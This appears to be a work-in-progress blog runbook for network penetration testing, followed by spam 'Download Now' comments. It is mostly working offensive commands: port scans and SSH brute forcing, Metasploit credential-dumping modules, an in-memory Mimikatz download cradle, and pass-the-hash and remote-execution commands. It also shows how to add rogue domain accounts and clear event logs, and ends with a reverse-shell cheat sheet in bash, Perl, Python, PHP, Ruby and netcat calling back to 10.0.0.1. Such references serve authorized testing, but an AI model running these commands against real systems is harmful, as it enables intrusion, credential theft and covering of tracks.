This is a rough copy of a runbook I am building for penetration testing. Still in progress. Suggestions please contact me.
Windows
Recon
nmap -sS -O -p1-65535 --script banner 192.168.1.1/24Scan all ports and detect OS + banner grab
nmap -sT -sU -sV -O -p1-65535 --script banner 192.168.1.1/24TCP(full connect scan) + UDP scan + service version + OS detection + banner of all ports (slow)
nmap -sn -n T4 192.168.1.1/24Ping scan with no dns resolution
nmap -Pn -sS -T4 -sV -O --reason -oA filename 192.168.1.1/24Port scan all hosts + OS Detection + service version + Output to all formats + port response info
FOR /L %x in (1,1,255) do ping -n 1 192.168.2.%x | find /I "reply" >> c:\temp\pingresult.txtPing scan from Windows command line
1..255 | foreach-object { (new-object System.Net.Networkinformation.Ping).Send("192.168.2.$_") } | where-object {$_.Status -eq "success"} | select AddressPing scan with Windows Powershell
Brute Force
ncrack -u user -P password_list.txt -p ssh 192.168.1.1Run SSH brute force
Enumeration
enum4linux - Portcullis Labs
Plundering Windows Account Info via Authenticated SMB Sessions - Sans Penetration Testing
SQL
Hunting MySQL - Metasploit Unleashed
Admin-mssql-auxiliary-modules - Metasploit Unleashed
Attacking mssql with Metasploit - Darkoperator
Attacking MySQL with Metasploit - Pentestlab
Capture
Responder 2.0 - Owing Windows Networks part 2 - SpiderLabs
Responder 2.0 - Owning Windows Networks part 3 - SpiderLabs
Vulnerabiltiy Analysis
nmap --script smb-check-vulns.nse --script-args=unsafe=1 -p445Check for MS08-067 and other SMB vulns
Privilege escalation
meterpreter> getuidDisplay the user that the Meterpreter server is running as on the host
whoamiWindows or Linux check current user
whoami /groupsWindows – to check integrity level and permissions
idLinux – check permissions of current user
meterpreter> user post/windows/gather/win_privsThis module will print if UAC is enabled, and if the current account is ADMIN enabled. It will also print UID,foreground SESSION ID, is SYSTEM status and current process PRIVILEGES
meterpreter> getsystemAttempt to get system privs on system
Dumping hashes
Windows
meterpreter> run post/windows/gather/hashdumpDump the local user accounts from the SAM database using the registry
powershell "IEX (New-Object Net.WebClient).DownloadString('http://<invoke-mimkatz>'); Invoke-Mimikatz -DumpCreds"Run Invoke-Mimikatz in memory with Powershell web cradle. You can add all arguments to the end of command
meterpreter> use post/windows/gather/credentials/domain_hashdumpDump hashes from domain controller safely
Windows
Windows Privilege Escalation Fundamentals - FuzzySecurity
UAC what penetration testers should know - Cobalt Strike blog
windows-privesc-check - PentestMonkeys
Veil-Powerup usage guide - Harmj0y
Windows Exploit Suggester - GDSSecurity
Metasploit local exploit suggester - Metasploit
pinjector - Tarasco
Linux
Unix & Linux password cracking - Nixcraft
Basic Linux Privilege Escalation - g0tmi1k
Unix-privesc-check - Pentestmonkeys
LinEnum - rebootuser
Linuxprivchecker - rebootuser
Exploiting SUID executables - Pentestpartners
Post Exploitation
post/windows/recon/computer_browser_discovery - Uses railgun to discover hostnames and IPs on the network
post/windows/gather/arp-scanner - Scan without pinging boxes
post/windows/gather/cachedump - Dump domain creds
post/window/gather/checkvm - Check if host is a vm
post/window/gather/credentials/gpp - Pulls passwords out from group policy
post/window/gather/tortoisesvn - Windows admins use for svn
post/window/gather/winscp - Secure copy protocol this pulls out passwords
post/window/gather/dnscache_dump - See what sites users have visited
post/window/gather/enum_applications - Finds applications installed on computer
post/window/gather/enum_chrome /enum_ie/enum_firefox - Enumerates Firefox
post/window/gather/enum_termserv - Shows where box has rdp too
post/window/gather/enum_anattend - Contains creds
post/window/gather/inject_ca - Injects cert auth into the box
post/window/gather/inject_ca - Deletes cert auth to remove restrictions
post/window/gather/wlan/wlan_profile - Dumps wifi password in clear text for win7 and abovepost/windows/gather/enum_tokens - This module will identify systems that have a Domain Admin (delegation) token on themA portion of the above list is from the Metasploit Minute Video here
Active Directory
post/window/gather/enum_ad_computers - find computer on the domain very stealth
post/windows/gather/enum_ad_service_principal_names - find sql servers etc running services
post/window/gather/enum_ad_user_comments - User comments contains passwords for some
net view /domainList domain association
net view /domain:(domain)List hosts on domain. Same as network neighborhood
net view /domain "Domain Computers"List all domain computers
net view \\(computername)List shares on a computer
net user /domainList all users in domain
net group /domainList all groups in domain
net group /domain "group name"List users in group on domain
net user /domain "user"List information about domain user including group membership
nltest /dclist:(domain)List all domain controllers on domain
nltest /domain_trustMap domain trust
net localgroup /domain "administrators"List all domain controller administrators
net user username password /ADDAdd local user account
net user username password /ADD /DOMAINAdd new user account to domain
wmic useraccountList all local accounts with SID
Get-AdUser -Filter * -Properties SamAccountName, description | select SamAccountName, description | select -expand $_.resultsGet descriptions from AD to look for passwords stored in AD account. Can be done from any domain user
Running DLL
rundll32.exe dllname.dll,StartW
File exploring
dir /S /BDirwalk Windows
Passing shells
meterpreter> use post/window/manage/payload_injectCreate a new shell on box you already owned. 2 is 1 and 1 is none. Can be used to send session to another user
Lateral Movement
dir \\host\c$Check to see if your admin on another computer by listing the c$ share
runas /user:Domain\(user) something.exeCreate a token with creds from command line
runas /user:Domain\(user) /netonly something.exeCreate a token to pass creds
sekurlsa::pth /user:USERNAME /domain:DOMAIN /ntlm:HASH /run:COMMANDPass the hash with Mimikatz
SCHTASKS /Run /S system /U user /P password /I /TN "taskname"Run task immediately on remote system
wmic /node:(host) process call create (path to exe)Run exe on remote computer with WMIC
Powershell Invoke-Command -ComputerName (host) -ScriptBlock { dir c:\ }WinRM(port 5985) turned off by default(turned on for administration) Run command with Windows remoting
Cleaning up
meterpreter> clearevWill clear the Application, System and Security logs on a Window systems. There are no options or arguments
Reverse Shells
Bash
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
Perl
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Python Psuedo terminal
python -c "import pty;pty.spawn('/bin/bash')"Use this on raw shells
PHP
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
Ruby
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Netcat Linux
nc -e /bin/sh 10.0.0.1 1234
Netcat Windows
nc 10.10.0.1 1234 -e cmd.exe
References
Reverse shell cheat sheet - Pentestmonkeys
Netcat cheat sheet v1 - Sans Penetration Testing
Pen Test Diary: Runbook (Network Pentesting) >>>>> Download Now
BalasHapus>>>>> Download Full
Pen Test Diary: Runbook (Network Pentesting) >>>>> Download LINK
>>>>> Download Now
Pen Test Diary: Runbook (Network Pentesting) >>>>> Download Full
>>>>> Download LINK yX